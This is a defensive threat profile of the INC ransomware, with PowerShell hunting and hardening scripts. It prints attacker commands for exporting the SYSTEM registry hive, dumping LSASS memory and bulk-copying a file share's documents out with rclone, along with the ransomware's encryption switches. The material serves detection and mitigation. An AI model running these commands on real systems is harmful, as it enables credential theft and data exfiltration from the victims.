Threat behavior
Specific commands used for credential acquisition and data exfiltration:
- Credential acquisition (two commands observed): "C:\Windows\system32\taskmgr.exe" /4 and reg save HKLM\SYSTEM C:\ProgramData\sys
- Rclone exfiltration path: C:\windows\appcompat\rclone.exe --config c:/windows/appcompat/conf2.txt copy \\[compromised network share]\d$\DATA\ local:[identifier] --ignore-case --ignore-existing --auto-confirm --multi-thread-streams 20 --transfers 20 --checkers 20 --tpslimit 20 --include *.docx --include *.docm --include *.pdf --include *.pptx --include *.xls --include *.xlsx --include *.ppt --include *.txt --include *.pptx --include *.doc --include *.csv --include *.jpeg --include *.jpg --include .msg --max-size 1000M --max-age ****
- LSASS/ProcDump: C:\ProgramData\util.exe
Ransom:Win32/Inc.MA!MTB supports various command-line arguments to suit the threat actor's preferences.
Here is the help output for the supported arguments:
C:\Users\IEUser\Desktop>inc.exe --help
USAGE: inc.exe [ARGUMENTS]
ARGUMENTS:
  --file <FILE>        Encrypt only selected file
  --dir <DIRECTORY>    Encrypt only selected directory
  --mode <MODE>        Choose mode for file encryption (fast, medium, slow)
  --ens                Encrypt network shares
  --lhd                Load hidden drives
  --sup                Stop using process
  --hide               Hide console window
  --kill               Kill processes/services by mask
  --debug              Enable debug mode
  --help               Display this message
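The command lines in this section can be turned into a hunting rule. The following PowerShell is an added example, not code from this page or from Microsoft: it runs four pattern checks over process-creation events shaped like Sysmon Event ID 1 data. The events are constructed for illustration (the host name FS01 is invented, and the ProcDump-style arguments given to util.exe are an assumption, since the page lists only the path); the last event is a benign rclone job included to show that the rclone check keys on an admin share plus document globs rather than on rclone itself.

```powershell
# Added example (not from the Microsoft page): hunt for INC-style command lines
# in Sysmon Event ID 1 (process creation) records.
# The sample events below are constructed; see the comment at the end for
# building the same objects from the live Sysmon log.

$events = @(
    [pscustomobject]@{ TimeCreated = '2024-01-01T10:00:01'; Image = 'C:\windows\appcompat\rclone.exe'
        CommandLine = 'C:\windows\appcompat\rclone.exe --config c:/windows/appcompat/conf2.txt copy \\FS01\d$\DATA\ local:dump --include *.docx --include *.pdf --max-size 1000M' },
    [pscustomobject]@{ TimeCreated = '2024-01-01T10:02:15'; Image = 'C:\Windows\System32\reg.exe'
        CommandLine = 'reg save HKLM\SYSTEM C:\ProgramData\sys' },
    [pscustomobject]@{ TimeCreated = '2024-01-01T10:05:40'; Image = 'C:\ProgramData\util.exe'
        CommandLine = 'C:\ProgramData\util.exe -accepteula -ma lsass.exe C:\ProgramData\lsass.dmp' },   # ProcDump-style args: assumed
    [pscustomobject]@{ TimeCreated = '2024-01-01T10:30:00'; Image = 'C:\Users\Public\inc.exe'
        CommandLine = 'inc.exe --ens --lhd --hide --kill' },
    [pscustomobject]@{ TimeCreated = '2024-01-01T09:00:00'; Image = 'C:\Program Files\Backup\rclone.exe'
        CommandLine = 'rclone sync D:\Backups remote:backups' }   # benign scheduled backup, should not fire
)

# Each rule is a name plus a scriptblock that returns $true for a suspicious event.
$rules = @(
    @{ Name = 'Rclone copying from an admin share (\\host\X$) with --include globs'
       Test = { param($e) $e.CommandLine -match '(?i)\brclone\b.*\\\\[^\\]+\\[a-z]\$' -and $e.CommandLine -match '(?i)--include' } },
    @{ Name = 'Registry hive export via reg save (SAM/SYSTEM/SECURITY)'
       Test = { param($e) $e.CommandLine -match '(?i)\breg(\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM|SECURITY)\b' } },
    @{ Name = 'Full memory dump of lsass (ProcDump -ma) or lsass targeted from ProgramData'
       Test = { param($e) ($e.CommandLine -match '(?i)-ma\s+lsass') -or
                          ($e.Image -match '(?i)^C:\\ProgramData\\' -and $e.CommandLine -match '(?i)lsass') } },
    @{ Name = 'Two or more INC ransomware switches (--ens/--lhd/--kill/--sup/--hide)'
       Test = { param($e) ([regex]::Matches($e.CommandLine, '(?i)--(ens|lhd|kill|sup|hide)\b')).Count -ge 2 } }
)

function Find-IncActivity {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        foreach ($r in $rules) {
            if (& $r.Test $e) {
                [pscustomobject]@{ Time = $e.TimeCreated; Rule = $r.Name; Image = $e.Image; CommandLine = $e.CommandLine }
            }
        }
    }
}

Find-IncActivity -Events $events | Sort-Object Time | Format-Table -AutoSize -Wrap

# To run against the live Sysmon log instead of the sample, build $events with:
# $events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
#     ForEach-Object {
#         $x = [xml]$_.ToXml(); $d = @{}
#         $x.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
#         [pscustomobject]@{ TimeCreated = $_.TimeCreated; Image = $d.Image; CommandLine = $d.CommandLine }
#     }
```

On the constructed sample the first four events each fire exactly one rule and the vendor-path rclone job fires none. The rclone check deliberately requires both a UNC admin share source and at least one --include glob, because rclone is common in legitimate backup tooling; tune the lsass rule to your dumping-tool allow list, since ProcDump itself is a signed Sysinternals binary.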
Ransom:Win32/Inc.MA!MTB terminates processes and services whose names match the following masks:
- sql
- veeam
- backup
- exchange
- java
Ransom:Win32/Inc.MA!MTB avoids encrypting files in the following folders:
- Microsoft SQL Server
- Windows
- Program Files
- Program Files (x86)
- $RECYCLE.BIN
- AppData
Ransom:Win32/Inc.MA!MTB avoids encrypting files with the following extensions:
Ransom:Win32/Inc.MA!MTB uses Curve25519 and AES algorithms to encrypt files.
Encrypted files have the .INC extension.
It generates ransom notes in .html and .txt formats.
The note states that the victim's data has been stolen and encrypted and will be published on the dark web if the ransom is not paid. The threat actors claim they are not a politically motivated group and just want money.
Key points from the ransom note:
- Your data has been stolen and encrypted.
- The threat actors will publish your data on the dark web if you do not pay the ransom.
- The threat actors claim they are not politically motivated and just want money.
- The threat actors offer decryption software and promise to destroy the stolen data if you pay the ransom.
- Victims are told to contact the threat actors over Tor using the personal ID given in the note.
- The threat actors warn you not to delete or modify the encrypted files, as this will cause problems with decryption.
- The threat actors warn you not to go to the police or the FBI, claiming they will not help you.
- The threat actors warn you not to go to data recovery companies, calling them middlemen who will make money off you and cheat you.
Prevention
Guidance for individual users
Keep your operating system and antivirus products up to date. Customers who have turned on automatic updates do not need to take additional action.
Take these steps to help prevent malware infection on your computer.
Guidance for enterprise administrators and Microsoft 365 Defender customers
Ransomware attacks enterprises more often than individuals. Following the mitigation steps below can help prevent ransomware attacks.
Microsoft recommends the following mitigations to reduce the impact of this threat's activity:
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Defender for Office 365 customers should ensure that Safe Attachments and Safe Links protection is enabled for users with Zero-hour Auto Purge (ZAP) to remove emails when a URL gets weaponized post-delivery.
- Microsoft 365 Defender customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks:
  - Block process creations originating from PsExec and WMI commands – Some organizations might experience compatibility issues with this rule on certain server systems but should deploy it to other systems to prevent lateral movement originating from PsExec and WMI, including Impacket's WMIexec.
  - Block executable files from running unless they meet a prevalence, age, or trusted list criterion
  - Use advanced protection against ransomware
  - Block all Office applications from creating child processes
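The endpoint-side settings in the list above can be applied with the Defender Antivirus PowerShell module. The script below is an added example, not Microsoft's own guidance or code: it assumes Defender Antivirus is in active mode on the host, and it uses the published ASR rule GUIDs for the four rules named above. Rolling the rules out in audit mode first is a choice made here, to catch the PsExec/WMI compatibility issue the list warns about before anything is blocked.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the Microsoft page): turn on cloud-delivered protection
# and the four ASR rules listed above, in audit mode by default.
# Assumptions: Defender Antivirus is active (not passive), and the GUIDs below are
# the published rule IDs for the rules named in this section.
param([switch]$Enforce)   # pass -Enforce to switch the rules from audit to block

$asrRules = [ordered]@{
    'd1e49aac-8f56-4280-b9ba-993a6d77406c' = 'Block process creations originating from PsExec and WMI commands'
    '01443614-cd74-433a-b99e-2ecdc07bfc25' = 'Block executable files unless they meet a prevalence, age, or trusted list criterion'
    'c1db55ab-c21a-4637-bb3f-a12568109d35' = 'Use advanced protection against ransomware'
    'd4f940ab-401b-4efc-aadc-ad5f3c50688a' = 'Block all Office applications from creating child processes'
}

# 1. Cloud-delivered protection: MAPS reporting plus automatic sample submission.
Set-MpPreference -MAPSReporting Advanced -SubmitSamplesConsent SendAllSamples

# 2. ASR rules. Audit mode logs event ID 1122 in the
#    Microsoft-Windows-Windows Defender/Operational log without blocking; review those
#    events on server workloads before re-running with -Enforce.
$action = if ($Enforce) { 'Enabled' } else { 'AuditMode' }
foreach ($rule in $asrRules.GetEnumerator()) {
    Add-MpPreference -AttackSurfaceReductionRules_Ids $rule.Key -AttackSurfaceReductionRules_Actions $action
    Write-Host ('{0,-9} {1}' -f $action, $rule.Value)
}

# 3. Read back the effective configuration. Actions come back as numbers:
#    0 = Disabled, 1 = Block, 2 = Audit, 6 = Warn.
$pref  = Get-MpPreference
$names = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }
for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
    $id    = $pref.AttackSurfaceReductionRules_Ids[$i]
    $state = $names[[int]$pref.AttackSurfaceReductionRules_Actions[$i]]
    $desc  = if ($asrRules.Contains($id)) { $asrRules[$id] } else { '(rule not in this list)' }
    '{0}  {1,-8}  {2}' -f $id, $state, $desc
}
```

EDR in block mode, automated investigation and remediation, and the Defender for Office 365 Safe Attachments/Safe Links/ZAP settings are tenant-level features configured in the Microsoft 365 Defender portal rather than per-endpoint cmdlets, so they are not covered by this script. In a managed fleet, deliver the same settings through Intune or Group Policy instead of running the script by hand; the read-back loop is still useful for confirming what a given host actually enforces.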